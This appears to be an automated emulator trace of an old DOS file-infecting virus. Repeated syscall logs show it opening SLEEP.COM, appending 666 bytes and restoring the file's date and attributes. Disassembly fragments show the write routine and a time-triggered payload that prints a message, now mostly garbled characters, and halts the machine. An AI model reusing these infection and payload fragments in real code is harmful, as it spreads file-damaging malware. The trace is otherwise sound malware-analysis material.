2018-12-25T12:54:38.003076708Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.005093112Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.013665773Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.015528455Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.024603743Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.039728949Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.0443155Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.046016848Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.053959986Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.066282448Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.074257887Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.076750812Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.084330799Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.086168462Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.089487977Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.099708283Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.101486256Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.11278959Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.115082349Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.124525058Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.136878495Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.140477458Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.1420957Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.16307803Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.174129042Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.182033475Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.18396596Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.192102483Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.193771292Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.199474231Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.21064951Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.212448374Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.219822783Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.222836433Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.232459571Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.243603622Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.246940139Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.249711293Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.256519683Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.267712886Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.276657551Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.278527257Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.286012976Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.289440706Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.29213956Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.302368254Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.304781991Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.310299337Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.311967199Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.324176441Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.335630493Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.33893766Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.340840953Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.348527577Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.360007923Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.367286869Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.37065513Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.378148988Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.379901275Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.384179777Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.393698687Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.395702102Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.404332014Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.406797475Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.416530443Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.429002798Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.432781189Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.434469812Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.441169492Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.454011614Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.461823639Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.463796921Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.468174188Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.470249478Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.479253324Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.495181895Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.498652977Z 78 PC: 12c66 | Find first file
2018-12-25T12:54:38.505463981Z 78 PC: 12c66 | Find first file (See above)
2018-12-25T12:54:38.513127829Z 78 PC: 12bf7 | Find first file
2018-12-25T12:54:38.520239224Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
0x12d1b: je 0x12d1e
0x12d1d: ret
0x12d1e: push ds
0x12d1f: xor ax, ax
0x12d21: mov ds, ax
0x12d23: mov byte ptr [0x417], 0x70
0x12d28: mov ah, 1
0x12d2a: int 0x16
0x12d2c: pop ds
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218
0x12d33: mov ah, 9
0x12d35: int 0x21
0x12d37: cli
0x12d38: hlt
0x12d39: dec ax
0x12d3a: insb byte ptr es:[di], dx
0x12d3c: popaw
0x12d3e: add word ptr [bx], di
2018-12-25T12:54:38.522987963Z 26 PC: 12b36 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17008,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:37.861324221Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:54:37.862407853Z 78 PC: 12b17 | Find first file
2018-12-25T12:54:37.867888755Z 47 PC: 12b1d | Get disk transfer address
2018-12-25T12:54:37.875266269Z 67 PC: 12ca3 | Get or set file attributes
2018-12-25T12:54:37.879134514Z 67 PC: 12cab | Get or set file attributes
2018-12-25T12:54:37.893953077Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:37.902730766Z 87 PC: 12cb8 | Get or set file date and time
2018-12-25T12:54:37.904558981Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:37.909600432Z 66 PC: 12b79 | Move file pointer
2018-12-25T12:54:37.911695138Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-25T12:54:37.913769415Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:54:37.920296011Z 66 PC: 12b97 | Move file pointer
2018-12-25T12:54:37.921566291Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:37.927277752Z 87 PC: 12bc0 | Get or set file date and time
2018-12-25T12:54:37.928661768Z 62 PC: 12bc6 | Close file
2018-12-25T12:54:37.934817946Z 67 PC: 12bcd | Get or set file attributes
2018-12-25T12:54:37.942566009Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.945864052Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.947601822Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.956456919Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.967995587Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.983071683Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.98566249Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.994200284Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.996278278Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.998978361Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.009126246Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.010739517Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.020115054Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.022789223Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.032842555Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.044028455Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.048351347Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.050554608Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.05816598Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.071104832Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.078908782Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.080877867Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.100157548Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.102065751Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.10500196Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.115597149Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.118108979Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.125963684Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.128132007Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.138715825Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.150158747Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.153541326Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.156240249Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.163044703Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.174344841Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.182693149Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.184696062Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.192394939Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.195202313Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.199172254Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.208592123Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.219849673Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.230188856Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.232062848Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.241824319Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.253054063Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.256435751Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.258025895Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.265364994Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.277116884Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.295986231Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.298379488Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.305978423Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.308138618Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.312181242Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.323976989Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.32588482Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.334607201Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.336764476Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.346273762Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.358552704Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.362067078Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.363591871Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.37049588Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.382337239Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.390083953Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.392087599Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.400868757Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.402854872Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.406692254Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.417995895Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.420352479Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.428332537Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.431223732Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.440726754Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.452066269Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.455103978Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.457661394Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.464559606Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.477233908Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.486133448Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.488086545Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.495659578Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.501874789Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.506204628Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.515848363Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.518665376Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.526742481Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.52883275Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.539120217Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.550763782Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.554509609Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.556216289Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.563921882Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.574714831Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.582525428Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.585548164Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.593086159Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.595187721Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.607171772Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.618698397Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.621798272Z 78 PC: 12c66 | Find first file
2018-12-25T12:54:38.62933397Z 78 PC: 12c66 | Find first file (See above)
2018-12-25T12:54:38.636608691Z 78 PC: 12bf7 | Find first file
2018-12-25T12:54:38.640521796Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
0x12d1b: je 0x12d1e
0x12d1d: ret
0x12d1e: push ds
0x12d1f: xor ax, ax
0x12d21: mov ds, ax
0x12d23: mov byte ptr [0x417], 0x70
0x12d28: mov ah, 1
0x12d2a: int 0x16
0x12d2c: pop ds
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218
0x12d33: mov ah, 9
0x12d35: int 0x21
0x12d37: cli
0x12d38: hlt
0x12d39: dec ax
0x12d3a: insb byte ptr es:[di], dx
0x12d3c: popaw
0x12d3e: add word ptr [bx], di
2018-12-25T12:54:38.64312077Z 9 PC: 12d37 | Display string (String= ' �� ����� ������� ����? �������-�������? �� ����� ������� ����? �������� ��� �� ����!')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":17008,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:38.14357498Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:54:38.145102376Z 78 PC: 12b17 | Find first file
2018-12-25T12:54:38.150872416Z 47 PC: 12b1d | Get disk transfer address
2018-12-25T12:54:38.151730456Z 67 PC: 12ca3 | Get or set file attributes
2018-12-25T12:54:38.156029651Z 67 PC: 12cab | Get or set file attributes
2018-12-25T12:54:38.767153896Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:38.774186324Z 87 PC: 12cb8 | Get or set file date and time
2018-12-25T12:54:38.776428426Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:38.783622299Z 66 PC: 12b79 | Move file pointer
2018-12-25T12:54:38.785450865Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-25T12:54:38.788289152Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:54:38.967771115Z 66 PC: 12b97 | Move file pointer
2018-12-25T12:54:38.969139902Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:38.975684639Z 87 PC: 12bc0 | Get or set file date and time
2018-12-25T12:54:38.977264222Z 62 PC: 12bc6 | Close file
2018-12-25T12:54:38.985093427Z 67 PC: 12bcd | Get or set file attributes
2018-12-25T12:54:38.995632491Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.999025796Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.000012669Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.005489552Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.015909279Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.022258779Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.02356763Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.030606043Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.032479007Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.034931334Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.043338874Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.044654345Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.050851017Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.052138149Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.060125163Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.069565556Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.07207077Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.073563372Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.079234404Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.088969496Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.096319472Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.097588495Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.103759186Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.10552064Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.107765888Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.115703084Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.117891968Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.12413065Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.125436876Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.13334038Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.142844953Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.145505752Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.147227133Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.152637295Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.161980608Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.17390319Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.175504633Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.182354722Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.184687331Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.18716605Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.195301793Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.197425199Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.204011311Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.205274502Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.218270465Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.227779967Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.230128931Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.231547166Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.236838604Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.246498323Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.253198879Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.25438371Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.260224075Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.262142817Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.264330036Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.272212404Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.27366775Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.279867274Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.281132345Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.288923271Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.298256185Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.300663865Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.302282146Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.308187624Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.317470644Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.324004238Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.325787667Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.332143001Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.333884443Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.337242173Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.346129957Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.347288312Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.353991729Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.355717747Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.363388831Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.373367621Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.375823593Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.376746493Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.382243151Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.39107071Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.3951744Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.396238151Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.400071133Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:39.400946411Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:39.402685264Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:39.407762636Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:39.408697913Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:39.413130443Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.414590967Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.421577182Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.42926695Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.430903632Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:39.431645286Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:39.438208715Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:39.447690548Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:39.453958533Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:39.458793975Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:39.464833337Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:39.4661334Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:39.473303945Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:39.48307327Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:39.485526817Z 78 PC: 12c66 | Find first file
2018-12-25T12:54:39.495765067Z 78 PC: 12c66 | Find first file (See above)
2018-12-25T12:54:39.50635893Z 78 PC: 12bf7 | Find first file
2018-12-25T12:54:39.511718877Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
0x12d1b: je 0x12d1e
0x12d1d: ret
0x12d1e: push ds
0x12d1f: xor ax, ax
0x12d21: mov ds, ax
0x12d23: mov byte ptr [0x417], 0x70
0x12d28: mov ah, 1
0x12d2a: int 0x16
0x12d2c: pop ds
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218
0x12d33: mov ah, 9
0x12d35: int 0x21
0x12d37: cli
0x12d38: hlt
0x12d39: dec ax
0x12d3a: insb byte ptr es:[di], dx
0x12d3c: popaw
0x12d3e: add word ptr [bx], di
2018-12-25T12:54:39.513821614Z 26 PC: 12b36 | Set disk transfer address